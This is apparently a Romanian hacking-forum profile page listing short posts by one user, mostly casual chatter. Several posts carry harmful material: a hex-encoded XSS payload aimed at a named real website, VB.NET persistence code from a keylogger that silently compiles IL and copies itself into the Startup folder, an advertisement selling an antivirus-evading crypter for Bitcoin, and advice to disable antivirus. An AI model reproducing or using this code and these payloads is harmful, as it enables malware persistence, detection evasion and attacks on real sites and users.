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Everything posted by Byte-ul

  1. Byte-ul


    @Aerosol pana a dat crash
  2. Byte-ul


    vreau si eu.... for research... )
  3. Byte-ul

    Kiwi Q&A

    wtf? Iti e greu sa instalezi si sa vezi singur cum e?
  4. da, s-a mutat pe sugipula.pro
  5. Da, este nevoie. Ce "lots of dependencies"? Windows 7 vine cu .net 2 si 3 preisntalat, Win 8 vine cu .net 4. Probabil si majoritatea sistemelor ce ruleaza Windows XP au .net framework instalat manual. E ca si cum ai zice ca un crypter in c++ nu e bun pentru ca nu merge pe linux
  6. 68:74:74:70:3a:2f:2f:63:61:72:74:69:64:65:6a:6f:63:2e:72:6f:2f:73:69:74:65:2f:64:65:74:61:6c:69:69:2f:64:65:74:61:6c:69:69:2e:70:68:70:3f:70:3d:31:38:35:22:3e:3c:73:63:72:69:70:74:3e:70:72:6f:6d:70:74:28:31:29:3c:2f:73:63:72:69:70:74:3e
  7. Nu e ala postat de Aerosol?
  8. Download: pasaroi.rar Password: caca Sunt toate fisierele, cred ca merge si instalat.
  9. Ceva mai special gasit intr-un keylogger Public Sub ILAddToStartUp(ByVal assemblyName As String) Dim genLocation As String = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) & "\" & assemblyName & ".il" Dim genExe As String = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) & "\" & assemblyName & ".exe" Dim ILAsm As String = Environment.SystemDirectory(0) & ":\Windows\Microsoft.NET\Framework\v2.0.50727\ilasm.exe" Dim copied As String = Environment.GetFolderPath(Environment.SpecialFolder.Startup) & "\" & IO.Path.GetFileName(Windows.Forms.Application.ExecutablePath) Try If IO.File.Exists(genLocation) Then IO.File.Delete(genLocation) 'If IO.File.Exists(genExe) Then IO.File.Delete(genExe) If IO.File.Exists(copied) Then Exit Sub Dim newLine As String = Environment.NewLine Dim source As String = Windows.Forms.Application.ExecutablePath Dim code As String = ".assembly extern mscorlib {}" & newLine & _ ".assembly extern System {" & newLine & _ " .ver 2:0:0:0" & newLine & _ " .publickeytoken = (B7 7A 5C 56 19 34 E0 89)" & newLine & _ "}" & newLine & _ ".assembly " & assemblyName & "{ .ver 1:0:1:0 }" & newLine & _ ".module " & assemblyName & ".exe" & newLine & _ ".method public static void Main() cil managed {" & newLine & _ ".maxstack 2" & newLine & _ ".entrypoint" & newLine & _ ".locals init ([0] class [mscorlib]System.Exception ex)" & newLine & _ "L_02: ldstr """ & source & """" & newLine & _ "L_07: ldstr """ & Environment.GetFolderPath(Environment.SpecialFolder.Startup) & "\" & IO.Path.GetFileName(source) & """" & newLine & _ "L_0c: call void [mscorlib]System.IO.File::Copy(string, string)" & newLine & _ "L_12: leave.s L_23" & newLine & _ "L_14: dup" & newLine & _ "L_1a: stloc.0" & newLine & _ "L_21: leave.s L_23" & newLine & _ "L_23: nop" & newLine & _ "L_25: ret" & newLine & _ ".try L_02 to L_14 catch [mscorlib]System.Exception handler L_14 to L_23" & newLine & _ "}" code = code.Replace("\", "\\") IO.File.WriteAllText(genLocation, code) Shell(ILAsm & " " & ChrW(34) & genLocation & ChrW(34), AppWinStyle.Hide) While Not IO.File.Exists(genExe) System.Threading.Thread.Sleep(10) End While Shell(genExe, AppWinStyle.Hide) While Not IO.File.Exists(copied) System.Threading.Thread.Sleep(10) End While IO.File.Delete(genLocation) Catch ex As Exception End Try End Sub
  10. Citeste aici: https://rstforums.com/forum/100689-coailii-password-recovery-admin-panel.rst
  11. Nu necesita instalare. Descarci executabilul si il rulezi.
  12. De ce e prima pagina plina cu numele la 2 ratati?
  13. Foloseste alt browser
  14. Dezactiveaza antivirusul.
  15. Scan: RazorScanner - Scan Result > Fisierul criptat este putin mai mare decat cel original Accept doar BTC Pot sa va arat dovada prin TeamViewer (cryptez, rulez, scanez) Se poate folosi doar in scopuri educationale (sa vedeti cum functioneaza un crypter, etc) Banii, apoi produsul
  16. Trebuie sa deschida executabilul creat de catre aplicatie.
  17. "Trebuie sa te loghezi pentru a avea acces la loguri."
  18. Nu ai nevoie de ajutor. Ai reusit sa iti faci cont pe acest forum, vei reusi si sa instalezi panelul. Trebuie sa te loghezi pentru a avea acces la loguri. bafta
  19. Uite aceeasi chestie formatata frumos: [JavaScript] asd - Pastebin.com
  20. Mai ai Limbo? As vrea eu. Thanks.
  21. Daca deschizi cu notepad++ se vede bine continutul?
  22. wtf is this? :) :) cum a fost pizza?
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